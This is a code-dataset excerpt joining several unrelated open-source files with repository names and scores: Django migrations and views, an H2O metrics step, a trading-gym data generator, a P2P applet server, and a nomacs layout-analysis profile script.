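# A submission is kept only if it matches a keyword/regexp and trips none of the
# ignore or exclusion rules.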
| 3.34375 | 3 |
tests/test_mock_audio.py | CameronJRAllan/eTree-Browser | 1 | 12786770 | <reponame>CameronJRAllan/eTree-Browser
from unittest import TestCase
import os
import mock
import pytest
from PyQt5 import QtWidgets
import application
import audio
class TestApplication():
@pytest.fixture(scope="function", autouse=True)
def setup(self, qtbot):
# Create dialog to show this instance
self.dialog = QtWidgets.QMainWindow()
# Start main event loop
self.prog = application.mainWindow(self.dialog)
| 2.25 | 2 |
public-engines/iris-h2o-automl/marvin_iris_h2o_automl/training/metrics_evaluator.py | guialba/incubator-marvin | 101 | 12786771 | #!/usr/bin/env python
# coding=utf-8
"""MetricsEvaluator engine action.
Use this module to add the project main code.
"""
from .._compatibility import six
from .._logging import get_logger
from marvin_python_toolbox.engine_base import EngineBaseTraining
from ..model_serializer import ModelSerializer
__all__ = ['MetricsEvaluator']
logger = get_logger('metrics_evaluator')
class MetricsEvaluator(ModelSerializer, EngineBaseTraining):
def __init__(self, **kwargs):
super(MetricsEvaluator, self).__init__(**kwargs)
def execute(self, params, **kwargs):
import h2o
from sklearn import metrics
# h2o.init()
y_test = self.marvin_dataset['test_X']['Species']
self.marvin_dataset['test_X'].drop(columns='Species', inplace=True)
teste = h2o.H2OFrame.from_python(self.marvin_dataset['test_X'])
preds = self.marvin_model.predict(teste).as_data_frame()['predict'].values
self.marvin_metrics = metrics.accuracy_score(y_test, preds)
| 2.28125 | 2 |
bettertexts/migrations/0001_initial.py | citizenline/citizenline | 0 | 12786772 | # Generated by Django 2.2.3 on 2019-09-26 19:42
import bettertexts.models
import ckeditor.fields
from decimal import Decimal
from django.conf import settings
import django.contrib.sites.managers
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import django_extensions.db.fields
import model_utils.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
('sites', '0002_alter_domain_unique'),
]
operations = [
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question', models.CharField(max_length=200, verbose_name='question')),
('position', models.IntegerField(verbose_name='position')),
],
options={
'verbose_name': 'question',
'verbose_name_plural': 'questions',
'ordering': ('position',),
},
),
migrations.CreateModel(
name='Type',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='name')),
('header', models.CharField(max_length=200, verbose_name='main header')),
('rating_header', models.CharField(blank=True, max_length=200, verbose_name='rating header')),
('comment_header', models.CharField(blank=True, max_length=200, verbose_name='comment header')),
('response_header', models.CharField(blank=True, max_length=200, verbose_name='response header')),
('rating_enabled', models.BooleanField(default=True, verbose_name='rating enabled')),
('comment_enabled', models.BooleanField(default=True, verbose_name='comment enabled')),
('notification_enabled', models.BooleanField(default=True, verbose_name='notification enabled')),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
],
options={
'verbose_name': 'communication type',
'verbose_name_plural': 'communication types',
},
managers=[
('objects', bettertexts.models.TypeManager()),
('on_site', django.contrib.sites.managers.CurrentSiteManager()),
],
),
migrations.CreateModel(
name='TextComment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('object_pk', models.TextField(verbose_name='object ID')),
('user_name', models.CharField(blank=True, max_length=50, verbose_name="user's name")),
('user_email', models.EmailField(blank=True, max_length=254, verbose_name="user's email address")),
('user_url', models.URLField(blank=True, verbose_name="user's URL")),
('inform', models.BooleanField(default=False, help_text='Check this box to keep me informed about updates.', verbose_name='Keep informed')),
('involved', models.BooleanField(default=False, help_text='Check this box to make more texts better.', verbose_name='Stay involved')),
('comment', models.TextField(max_length=3000, verbose_name='comment')),
('submit_date', models.DateTimeField(default=None, verbose_name='date/time submitted')),
('ip_address', models.GenericIPAddressField(blank=True, null=True, unpack_ipv4=True, verbose_name='IP address')),
('is_public', models.BooleanField(default=True, help_text='Uncheck this box to make the comment effectively disappear from the site.', verbose_name='is public')),
('is_removed', models.BooleanField(default=False, help_text='Check this box if the comment is inappropriate. A "This comment has been removed" message will be displayed instead.', verbose_name='is removed')),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='content_type_set_for_textcomment', to='contenttypes.ContentType', verbose_name='content type')),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='textcomment_comments', to=settings.AUTH_USER_MODEL, verbose_name='user')),
],
options={
'verbose_name': 'comment',
'verbose_name_plural': 'comments',
'ordering': ('submit_date',),
'permissions': [('can_moderate', 'Can moderate comments')],
},
),
migrations.CreateModel(
name='Text',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, verbose_name='title')),
('slug', django_extensions.db.fields.RandomCharField(blank=True, editable=False, length=8, unique=True, verbose_name='slug')),
('intro', ckeditor.fields.RichTextField(blank=True, max_length=20000, verbose_name='intro')),
('body', ckeditor.fields.RichTextField(max_length=20000, verbose_name='text')),
('version', models.PositiveIntegerField(default=0, verbose_name='version')),
('pub_date', models.DateTimeField(auto_now_add=True, verbose_name='date published')),
('end_date', models.DateTimeField(blank=True, null=True, verbose_name='date end')),
('site', models.ForeignKey(default=1, editable=False, on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
('type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bettertexts.Type')),
],
options={
'verbose_name': 'text',
'verbose_name_plural': 'texts',
},
managers=[
('objects', bettertexts.models.TypeManager()),
],
),
migrations.CreateModel(
name='Rating',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('version', models.PositiveIntegerField(default=0, verbose_name='version')),
('range', models.PositiveIntegerField(default=10, verbose_name='range')),
('count', models.PositiveIntegerField(default=0, verbose_name='count')),
('total', models.PositiveIntegerField(default=0, verbose_name='total')),
('average', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=6, verbose_name='average')),
('question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bettertexts.Question', verbose_name='Question')),
('text', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bettertexts.Text')),
],
options={
'verbose_name': 'rating',
'verbose_name_plural': 'ratings',
'unique_together': {('text', 'version', 'question')},
},
),
migrations.AddField(
model_name='question',
name='type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bettertexts.Type'),
),
migrations.CreateModel(
name='UserRating',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('user', models.CharField(max_length=200)),
('ip', models.GenericIPAddressField(blank=True, null=True)),
('score', models.PositiveSmallIntegerField()),
('rating', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='user_ratings', to='bettertexts.Rating')),
],
options={
'unique_together': {('user', 'rating')},
},
),
]
| 1.742188 | 2 |
SLpackage/private/pacbio/pythonpkgs/pbsmrtpipe/lib/python2.7/site-packages/pbsmrtpipe/__init__.py | fanglab/6mASCOPE | 5 | 12786773 | <filename>SLpackage/private/pacbio/pythonpkgs/pbsmrtpipe/lib/python2.7/site-packages/pbsmrtpipe/__init__.py<gh_stars>1-10
from __future__ import absolute_import, division, print_function
VERSION = '1.4.0'
def get_version():
return VERSION
__version__ = get_version()
def get_changelist():
# Legacy from the perforce era, but keeping this. It's not worth breaking
return "UnknownChangelist"
| 1.421875 | 1 |
cspace/main/appletserver.py | jmcvetta/cspace | 28 | 12786774 | <filename>cspace/main/appletserver.py
import os, sys, threading
from string import Template
from ncrypt.rand import bytes as rand_bytes
from ncrypt.rsa import RSAKey, RSAError
from nitro.selectreactor import SelectReactor
from nitro.tcp import tcpListen, TCPStream
from nitro.ssl import sslAbort
from nitro.linestream import TCPLineStream
from cspace.util.spawn import spawnProcess
from cspace.util.hexcode import hexEncode, hexDecode, HexDecodeError
from cspace.util.wordcode import wordEncode, wordDecode, WordDecodeError
from cspace.util.settings import getAppDir
from cspace.util.queue import ThreadQueue
from cspace.main.common import localSettings, appSettings, \
isValidUserName, isValidServiceName
from cspace.main.sslbridge import SSLBridge
def _substituteMetaVars( s ) :
if sys.platform == 'win32' :
_metaDict = dict( python='python.exe', pythonw='pythonw.exe' )
else :
_metaDict = dict( python='python', pythonw='python' )
_metaDict['approot'] = getAppDir()
return Template( s ).safe_substitute( _metaDict )
def _readCommand( settings, entryPath ) :
data = settings.getData( entryPath ).strip()
lines = [line.strip() for line in data.split('\n')]
return lines
class ServiceConfig( object ) :
def _listServices( self, settings ) :
services = []
for entry in settings.listEntries('Services') :
serviceName = entry.split('/')[-1]
assert isValidServiceName(serviceName)
serviceCommand = _readCommand( settings, entry )
services.append( (serviceName,serviceCommand) )
return services
def listSystemServices( self ) :
return self._listServices( appSettings() )
def listUserServices( self ) :
return self._listServices( localSettings() )
def listActiveServices( self ) :
sysServices = self.listSystemServices()
userServices = self.listUserServices()
serviceDict = {}
out = []
for x in userServices+sysServices :
if x[0] in serviceDict : continue
serviceDict[x[0]] = x
out.append( x )
return out
class ActionConfig( object ) :
def _listActions( self, settings ) :
actions = []
for entry in settings.listEntries('ContactActions') :
actionDir = entry.split('/')[-1]
assert isValidServiceName(actionDir)
actionName = settings.getData( entry+'/Action' ).strip()
actionCommand = _readCommand( settings, entry+'/Command' )
actionOrder = settings.getInt(entry+'/SortOrder',10000)
actions.append( (actionDir,actionName,actionCommand,actionOrder) )
return actions
def listSystemActions( self ) :
return self._listActions( appSettings() )
def listUserActions( self ) :
return self._listActions( localSettings() )
def listActiveActions( self ) :
sysActions = self.listSystemActions()
userActions = self.listUserActions()
actionDict = {}
out = []
for x in userActions+sysActions :
if x[0] in actionDict : continue
actionDict[x[0]] = x
out.append( x )
return out
class BridgeThread( threading.Thread ) :
def __init__( self ) :
threading.Thread.__init__( self )
self.reactor = SelectReactor()
self.threadQueue = ThreadQueue( self._onMessage, self.reactor )
self.bridges = {}
self.start()
def _onMessage( self, msg ) :
cmd,args = msg[0],msg[1:]
if cmd == 'bridge' :
sock,sslConn = args
bridge = SSLBridge( sock, sslConn, self.reactor )
self.bridges[bridge] = 1
bridge.setCloseCallback( lambda : self._onBridgeClosed(bridge) )
elif cmd == 'clear' :
for b in self.bridges.keys() :
b.shutdown()
self.bridges.clear()
elif cmd == 'stop' :
for b in self.bridges.keys() :
b.shutdown()
self.bridges.clear()
self.reactor.stop()
def _onBridgeClosed( self, bridge ) :
del self.bridges[bridge]
def run( self ) :
self.reactor.run()
class AppletConnection( object ) :
DEFAULT = 0
CONNECTING = 1
WAITING_BRIDGE = 2
LISTENER = 3
CLOSED = 4
def __init__( self, sock, reactor, appletServer ) :
self.reactor = reactor
self.stream = TCPLineStream( sock, reactor )
self.appletServer = appletServer
self.appletServer.appletConnections[self] = 1
self.session = appletServer.session
self.incoming = appletServer.incoming
self.state = self.DEFAULT
self._writeData = self.stream.writeData
rt = {}
self.requestTable = rt
rt['echo'] = self._doEcho
rt['getcontacts'] = self._doGetContacts
rt['getpubkey'] = self._doGetPubKey
rt['getcontactpubkeys'] = self._doGetContactPubKeys
rt['connect'] = self._doConnect
rt['connectpubkey'] = self._doConnectPubKey
rt['accept'] = self._doAccept
rt['getincomingpubkey'] = self._doGetIncomingPubKey
rt['registerlistener'] = self._doRegisterListener
rt['sendlistener'] = self._doSendListener
self.stream.setInputCallback( self._onInput )
self.stream.setCloseCallback( self._onClose )
self.stream.setErrorCallback( self._onError )
self.stream.enableRead( True )
def _setClosed( self ) :
del self.appletServer.appletConnections[self]
self.state = self.CLOSED
def shutdown( self, deferred=False ) :
if self.state == self.CONNECTING :
self.connectOp.cancel()
elif self.state == self.LISTENER :
self.appletServer.unregisterListener( self.listenerName )
elif self.state == self.WAITING_BRIDGE :
sslAbort( self.peerSSLConn )
self.stream.close( deferred )
self._setClosed()
def _onClose( self ) :
self.shutdown()
def _onError( self, err, errMsg ) :
self.shutdown()
def _writeLine( self, line ) :
self._writeData( line + '\r\n' )
def _writeWords( self, words ) :
words = [wordEncode(w) for w in words]
self._writeData( ' '.join(words) + '\r\n' )
def _writeError( self, msg ) :
self._writeLine( 'ERROR %s' % msg )
def _writeResult( self, words ) :
self._writeWords( ['OK'] + words )
def dispatchMessage( self, msg ) :
assert self.state == self.LISTENER
self._writeWords( ['MSG'] + msg )
def _doEcho( self, words ) :
self._writeResult( words )
def _doGetContacts( self, words ) :
if len(words) != 0 :
self._writeError( 'Malformed request' )
return
if not self.session.isOnline() :
self._writeError( 'Not online' )
return
names = self.session.getProfile().getContactNames()
contacts = [self.session.getProfile().getContactByName( name ) for name in names]
self._writeResult( [c.getNickName() for c in contacts] )
def _doGetPubKey( self, words ) :
if len(words) > 1 :
self._writeError( 'Malformed request' )
return
if not self.session.isOnline() :
self._writeError( 'Not online' )
return
if len(words) == 0 :
keyData = self.session.getProfile().rsaKey.toDER_PublicKey()
self._writeResult( [hexEncode(keyData)] )
return
contact = self.session.getProfile().getContactByName( words[0] )
if contact is None :
self._writeError( 'Unknown contact' )
return
self._writeResult( [hexEncode(contact.publicKeyData)] )
def _doGetContactPubKeys( self, words ) :
if len(words) != 0 :
self._writeError( 'Malformed request' )
return
if not self.session.isOnline() :
self._writeError( 'Not online' )
return
out = []
profile = self.session.getProfile()
for name in profile.getContactNames() :
c = profile.getContactByName( name )
out.extend( [c.name,hexEncode(c.publicKeyData)] )
self._writeResult( out )
def _connectInternal( self, publicKey, service ) :
def onWriteComplete() :
self.stream.shutdown()
sock = self.stream.getSock()
self.appletServer.bridgeThread.threadQueue.postMessage(
('bridge',sock,self.peerSSLConn) )
self._setClosed()
def onConnect( err, sslConn ) :
if err < 0 :
self._writeError( 'Connect failed' )
self.state = self.DEFAULT
return
self._writeResult( ['Connected'] )
self.peerSSLConn = sslConn
self.state = self.WAITING_BRIDGE
self.stream.enableRead( False )
self.stream.setWriteCompleteCallback( onWriteComplete )
self.connectOp = self.session.connectTo( publicKey, service,
onConnect )
self.state = self.CONNECTING
def _doConnect( self, words ) :
if len(words) != 2 :
self._writeError( 'Malformed request' )
return
contactName, service = words
if not self.session.isOnline() :
self._writeError( 'Not online' )
return
contact = self.session.getProfile().getContactByName( contactName )
if not contact :
self._writeError( 'Unknown contact' )
return
self._connectInternal( contact.publicKey, service )
def _doConnectPubKey( self, words ) :
if len(words) != 2 :
self._writeError( 'Malformed request' )
return
hexPubKey, service = words
if not self.session.isOnline() :
self._writeError( 'Not online' )
return
try :
pubKeyData = hexDecode( hexPubKey )
pubKey = RSAKey()
pubKey.fromDER_PublicKey( pubKeyData )
except (HexDecodeError,RSAError) :
self._writeError( 'Malformed publickey' )
return
self._connectInternal( pubKey, service )
def _doAccept( self, words ) :
if len(words) != 1 :
self._writeError( 'Malformed request' )
return
connectionId = words[0]
sslConn = self.incoming.acceptIncoming( connectionId )
if not sslConn :
self._writeError( 'Invalid connection' )
return
self._writeResult( ['Connected'] )
self.peerSSLConn = sslConn
self.state = self.WAITING_BRIDGE
self.stream.enableRead( False )
def onWriteComplete() :
self.stream.shutdown()
sock = self.stream.getSock()
self.appletServer.bridgeThread.threadQueue.postMessage(
('bridge',sock,self.peerSSLConn) )
self._setClosed()
self.stream.setWriteCompleteCallback( onWriteComplete )
def _doGetIncomingPubKey( self, words ) :
if len(words) != 1 :
self._writeError( 'Malformed request' )
return
connectionId = words[0]
peerKey = self.incoming.getPeerKey( connectionId )
if not peerKey :
self._writeError( 'Invalid connection' )
return
self._writeResult( [hexEncode(peerKey.toDER_PublicKey())] )
def _doRegisterListener( self, words ) :
if len(words) != 1 :
self._writeError( 'Malformed request' )
return
listenerName = words[0]
result = self.appletServer.registerListener( listenerName, self )
if not result :
self._writeError( 'Listener already registered' )
return
self.listenerName = listenerName
self.state = self.LISTENER
self._writeResult( ['Registered'] )
def _doSendListener( self, words ) :
if len(words) <= 1 :
self._writeError( 'Malformed request' )
return
listenerName = words[0]
listener = self.appletServer.getListener( listenerName )
if listener is None :
self._writeError( 'No such listener' )
return
listener.dispatchMessage( words[1:] )
self._writeResult( ['Sent'] )
def _onInput( self, line ) :
assert self.state in (self.DEFAULT,self.CONNECTING,self.LISTENER)
if self.state in (self.CONNECTING,self.LISTENER) :
self._writeError( 'Junk received' )
self.shutdown( deferred=True )
return
words = line.strip().split()
if len(words) == 0 : return
try :
words = [wordDecode(w) for w in words]
except WordDecodeError :
self._writeError( 'Malformed request' )
return
cmd = words[0].lower()
handler = self.requestTable.get( cmd, None )
if not handler :
self._writeError( 'Unknown request' )
return
handler( words[1:] )
class IncomingConnections( object ) :
def __init__( self, reactor ) :
self.reactor = reactor
self.connections = {}
def clearConnections( self ) :
for sslConn,peerKey,timerOp in self.connections.values() :
sslAbort( sslConn )
timerOp.cancel()
self.connections.clear()
def addIncoming( self, sslConn, peerKey ) :
while True :
connectionId = hexEncode( rand_bytes(8) )
if connectionId not in self.connections : break
def onTimeout() : self._onTimeout( connectionId )
timerOp = self.reactor.callLater( 30, onTimeout )
self.connections[connectionId] = (sslConn,peerKey,timerOp)
return connectionId
def acceptIncoming( self, connectionId ) :
info = self.connections.pop( connectionId, None )
if info is None :
return None
sslConn,peerKey,timerOp = info
timerOp.cancel()
return sslConn
def getPeerKey( self, connectionId ) :
info = self.connections.get( connectionId )
if info is None :
return None
return info[1]
def _onTimeout( self, connectionId ) :
sslConn,peerKey,timerOp = self.connections.pop( connectionId )
sslAbort( sslConn )
class AppletServer( object ) :
def __init__( self, session, actionManager, reactor ) :
self.session = session
self.actionManager = actionManager
self.reactor = reactor
self.listener = tcpListen( ('127.0.0.1',0), reactor, self._onNewConnection )
self.listenPort = self.listener.getSock().getsockname()[1]
print 'listenport = %d' % self.listenPort
self.serviceConfig = ServiceConfig()
self.actionConfig = ActionConfig()
self.listeners = {}
self.incoming = IncomingConnections( self.reactor )
self.services = []
self.appletConnections = {}
for (service,command) in self.serviceConfig.listActiveServices() :
def doRegisterService( service, command ) :
def onService( sslConn, peerKey, contactName, incomingName ) :
self._onService( service, command, sslConn,
peerKey, contactName, incomingName )
self.session.registerService( service, onService )
doRegisterService( service, command )
self.services.append( service )
self.actions = []
for (actionDir,action,command,order) in self.actionConfig.listActiveActions() :
def doRegisterAction( actionDir, action, command, order ) :
def onAction( contactName ) :
self._onAction( actionDir, action, command, contactName )
return self.actionManager.registerAction( action, onAction, order )
actionId = doRegisterAction( actionDir, action, command, order )
self.actions.append( actionId )
if actionDir == 'TextChat' :
self.actionManager.setDefaultAction( actionId )
self.bridgeThread = BridgeThread()
def shutdown( self ) :
self.incoming.clearConnections()
appletConns = self.appletConnections.keys()
for conn in appletConns :
conn.shutdown()
self.bridgeThread.threadQueue.postMessage( ('stop',) )
self.bridgeThread.join()
self.listener.close()
def clearConnections( self ) :
self.incoming.clearConnections()
appletConns = self.appletConnections.keys()
for conn in appletConns :
conn.shutdown()
self.bridgeThread.threadQueue.postMessage( ('clear',) )
def getListenPort( self ) : return self.listenPort
def registerListener( self, name, connection ) :
conn = self.listeners.setdefault( name, connection )
return conn is connection
def unregisterListener( self, name ) :
del self.listeners[name]
def getListener( self, name ) :
return self.listeners.get( name, None )
def _onNewConnection( self, sock ) :
AppletConnection( sock, self.reactor, self )
def _findProgram( self, relPath ) :
dirList = os.environ.get( 'PATH', '' ).split( ';' )
for d in dirList :
p = os.path.join( d, relPath )
if os.path.isfile(p) :
return p
return relPath
def _runCommand( self, command, envNew ) :
env = dict( os.environ.items() )
env.update( envNew )
cmdLine = [_substituteMetaVars(x) for x in command]
p = os.path.join( getAppDir(), cmdLine[0] )
if not os.path.isfile(p) :
p = self._findProgram( cmdLine[0] )
args = [p] + cmdLine[1:]
startingDir = os.getcwd()
result = spawnProcess( p, args, env, startingDir, 0 )
if not result :
print 'error starting command (%s)' % p
def _onService( self, service, command, sslConn, peerKey,
contactName, incomingName ) :
print '_onService( service=%s command=%s from=(%s,%s) )' % (
service, command, contactName, incomingName )
connectionId = self.incoming.addIncoming( sslConn, peerKey )
env = {}
env['CSPACE_PORT'] = str(self.listenPort)
env['CSPACE_USER'] = self.session.getProfile().name
env['CSPACE_EVENT'] = 'INCOMING'
env['CSPACE_SERVICE'] = service
env['CSPACE_CONNECTIONID'] = connectionId
env['CSPACE_CONTACTNAME'] = contactName
env['CSPACE_INCOMINGNAME'] = incomingName
self._runCommand( command, env )
def _onAction( self, actionDir, action, command, contactName ) :
print '_onAction( actionDir=%s, action=%s, command=%s, contact=%s )' % (
actionDir, action, command, contactName )
env = {}
env['CSPACE_PORT'] = str(self.listenPort)
env['CSPACE_USER'] = self.session.getProfile().name
env['CSPACE_EVENT'] = 'CONTACTACTION'
env['CSPACE_CONTACTNAME'] = contactName
env['CSPACE_ACTIONDIR'] = actionDir
env['CSPACE_ACTION'] = action
self._runCommand( command, env )
| 2.046875 | 2 |
trading_gym/envs/portfolio_gym/data_generator.py | zhaoshiying97/trading_gym | 32 | 12786775 | <reponame>zhaoshiying97/trading_gym<filename>trading_gym/envs/portfolio_gym/data_generator.py
import numpy as np
import pandas as pd
import pdb
class DataGeneratorDF(object):
"""input is a DataFrame with MultiIndex, considering Panal data structure is depreciated after pandas=0.24"""
def __init__(self, data_df, sequence_window=2, add_cash=False, risk_free_return=0.0001):
data_df = data_df.rename_axis(["order_book_id","datetime"])
self.data_df = data_df
self.order_book_ids = list(data_df.index.levels[0])
self.trading_dates = list(data_df.index.levels[1])
self.number_feature = len(data_df.columns) -1
self.sequence_window = sequence_window
self.add_cash = add_cash
self.risk_free_return = risk_free_return
def step(self):
self.idx += 1
dt = self.trading_dates[self.idx-1]
if dt == self.trading_dates[-1]:
done = True
else:
done = False
state, one_step_fwd_returns = self._step(dt)
return state, one_step_fwd_returns, dt, done
def _step(self, dt):
idx = self.trading_dates.index(dt)+1
trading_dates_slice = self.trading_dates[idx - self.sequence_window: idx]
total_state = self.data_df.loc[(self.order_book_ids, trading_dates_slice),:]
#pdb.set_trace()
# fillna to a balanced panel data
total_state = total_state.unstack().stack(dropna=False)
# state
state = total_state.iloc[:,:self.number_feature]
# one_step_fwd_returns
one_step_fwd_returns = total_state.xs(dt, level="datetime").iloc[:,-1]
one_step_fwd_returns.name = "returns at {}".format(dt)
#pdb.set_trace()
if self.add_cash:
multi_index = pd.MultiIndex.from_tuples([("CASH", i) for i in trading_dates_slice])
df_cash = pd.DataFrame(1, index=multi_index, columns=state.columns)
state = pd.concat([state, df_cash])
one_step_fwd_returns.loc["CASH"] = self.risk_free_return
return state, one_step_fwd_returns
def reset(self):
self.idx = self.sequence_window
first_date = self.trading_dates[self.idx-1]
state, one_step_fwd_returns = self._step(first_date)
return state
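# Usage sketch (hypothetical data, not taken from any real feed): DataGeneratorDF
# expects a DataFrame indexed by (order_book_id, datetime) whose feature columns come
# first and whose last column holds the one-step forward returns, e.g.
#
#   idx = pd.MultiIndex.from_product(
#       [["000001.XSHE", "000002.XSHE"], pd.date_range("2020-01-01", periods=10)])
#   df = pd.DataFrame(np.random.randn(20, 3), index=idx,
#                     columns=["feature_1", "feature_2", "returns"])
#   gen = DataGeneratorDF(df, sequence_window=2, add_cash=True)
#   state = gen.reset()
#   state, one_step_fwd_returns, dt, done = gen.step()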
class DataGeneratorNP(object):
def __init__(self, data_np, order_book_ids, trading_dates, sequence_window=None, risk_free_return=0.0001):
number_order_book_id, total_dates, num_feature = data_np.shape
self.number_feature = num_feature
self._data = data_np
self.order_book_ids = order_book_ids
self.trading_dates = trading_dates
self.sequence_window = sequence_window
self.risk_free_return= risk_free_return
def step(self):
self.steps += 1
self.idx = self.steps + self.sequence_window
next_state = self._data[:,self.idx - self.sequence_window: self.idx, :self.number_feature-1]
dt = self.trading_dates[self.idx-1]
one_step_fwd_returns = self._data[:,self.idx-1, self.number_feature-1]
one_step_fwd_returns = pd.Series(index=self.order_book_ids, data=one_step_fwd_returns)
one_step_fwd_returns.loc["CASH"] = self.risk_free_return
return next_state, one_step_fwd_returns, dt
def reset(self):
self.steps = 0
self.idx = self.steps + self.sequence_window
dt = self.trading_dates[self.idx]
#pdb.set_trace()
state = self._data[:,self.idx - self.sequence_window: self.idx, :self.number_feature-1]
return state
if __name__ == "__main__":
pass
# order_book_ids = ["000001.XSHE","000002.XSHE"]
# total_dates = 20
# number_feature = 4 # contain returns
# sequence_window = 2
#
# data = np.random.randn(len(order_book_ids),total_dates, number_feature)
#
# data_generator = DataGenerator(data_np=data, order_book_ids=order_book_ids,trading_dates=list(range(1,total_dates+1)),sequence_window=sequence_window)
#
# state = data_generator.reset()
# next_state, one_step_fwd_returns, dt = data_generator.step()
| 2.921875 | 3 |
dsaii/views.py | khushi0205/DSAII | 0 | 12786776 | from django.shortcuts import render
from django.views import View
from django.views.generic import ListView, DetailView, CreateView
from django.http import HttpResponseRedirect
from .models import Post, Comments, Event, EveComm
from django.urls import reverse_lazy, reverse
from django.core.mail import send_mail
from django.conf import settings
import datetime
from .forms import CommentForm, CF
class Index(View):
def get(self, request, *args, **kwargs):
return render(request, 'index.html')
class Quiz(View):
def get(self, request, *args, **kwargs):
return render(request, 'quiz.html')
class Inaug(View):
def get(self, request, *args, **kwargs):
return render(request, 'inauguration.html')
class CodHr(View):
def get(self, request, *args, **kwargs):
return render(request, 'codinghr.html')
class Blogs(ListView):
model = Post
template_name = 'blogs.html'
class Events(ListView):
#model = Event
#template_name = 'events.html'
def get(self, request, *args, **kwargs):
return render(request, 'events.html')
class Eve(ListView):
model = Event
template_name = 'eve.html'
class Article(DetailView):
model = Post
template_name = 'article.html'
class Team(View):
def get(self, request, *args, **kwargs):
return render(request, 'about.html')
class Login(View):
def get(self, request, *args, **kwargs):
return render(request, 'l1.html')
class AddC(CreateView):
model = Comments
form_class = CommentForm
template_name = 'addcomm.html'
#fields = '__all__'
def form_valid(self, form):
form.instance.post_id = self.kwargs['pk']
return super().form_valid(form)
    success_url = reverse_lazy('blogs')
class EveC(CreateView):
model = EveComm
form_class = CF
template_name = 'addcomm.html'
# fields = '__all__'
def form_valid(self, form):
form.instance.post_id = self.kwargs['pk']
return super().form_valid(form)
    success_url = reverse_lazy('events')
| 2.09375 | 2 |
mud/admin.py | lambda-mud-cs18/backend | 1 | 12786777 | <reponame>lambda-mud-cs18/backend<filename>mud/admin.py<gh_stars>1-10
from django.contrib import admin
from .models import Player, PlayerInventory, Item, Team, Map, Room
# Register your models here.
admin.site.register(Player)
admin.site.register(PlayerInventory)
admin.site.register(Item)
admin.site.register(Team)
admin.site.register(Map)
admin.site.register(Room) | 1.601563 | 2 |
TranskribusDU/tasks/performCVLLA.py | Transkribus/TranskribusDU | 20 | 12786778 | # -*- coding: utf-8 -*-
"""
performCVLLA.py
create profile for nomacs (CVL LA toolkit)
<NAME>
copyright Xerox 2017
READ project
Developed for the EU project READ. The READ project has received funding
from the European Union's Horizon 2020 research and innovation programme
under grant agreement No 674943.
"""
import sys, os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0]))))
import glob
from copy import deepcopy
import common.Component as Component
from common.trace import traceln
from xml_formats.PageXml import PageXml
from xml_formats.PageXml import MultiPageXml
from util.Polygon import Polygon
from lxml import etree
class LAProcessor(Component.Component):
"""
"""
usage = ""
version = "v.01"
description = "description: Nomacs LA processor"
if sys.platform == 'win32':
cNomacs = '"C:\\Program Files\\READFramework\\bin\\nomacs.exe"'
else:
cNomacs = "/opt/Tools/src/tuwien-2017/nomacs/nomacs"
cCVLLAProfile = """
[%%General]
FileList="%s"
OutputDirPath=%s
FileNamePattern=<c:0>.<old>
PluginBatch\LayoutPlugin\General\drawResults=false
PluginBatch\LayoutPlugin\General\saveXml=true
PluginBatch\LayoutPlugin\General\\useTextRegions=%s
PluginBatch\LayoutPlugin\Layout Analysis Module\computeSeparators=true
PluginBatch\LayoutPlugin\Layout Analysis Module\localBlockOrientation=false
PluginBatch\LayoutPlugin\Layout Analysis Module\maxImageSide=3000
PluginBatch\LayoutPlugin\Layout Analysis Module\minSuperPixelsPerBlock=15
PluginBatch\LayoutPlugin\Layout Analysis Module\\removeWeakTextLines=true
PluginBatch\LayoutPlugin\Layout Analysis Module\scaleMode=1
PluginBatch\LayoutPlugin\Super Pixel Classification\classifierPath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\\featureFilePath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\labelConfigFilePath=
PluginBatch\LayoutPlugin\Super Pixel Labeler\maxNumFeaturesPerClass=10000
PluginBatch\LayoutPlugin\Super Pixel Labeler\maxNumFeaturesPerImage=1000000
PluginBatch\LayoutPlugin\Super Pixel Labeler\minNumFeaturesPerClass=10000
PluginBatch\pluginList=Layout Analysis | Layout Analysis
SaveInfo\Compression=-1
SaveInfo\DeleteOriginal=false
SaveInfo\InputDirIsOutputDir=true
SaveInfo\Mode=2
PluginBatch\LayoutPlugin\Super Pixel Labeler\\featureFilePath=
PluginBatch\LayoutPlugin\Layout Analysis Module\\removeWeakTextLines=true
"""
#PluginBatch\pluginList="Layout Analysis | Layout Analysis;Layout Analysis | Detect Lines"
cCVLLASeparatorProfile="""
[%%General]
FileList="%s"
OutputDirPath=%s
FileNamePattern=<c:0>.<old>
SaveInfo\Compression=-1
SaveInfo\Mode=2
SaveInfo\DeleteOriginal=false
SaveInfo\InputDirIsOutputDir=true
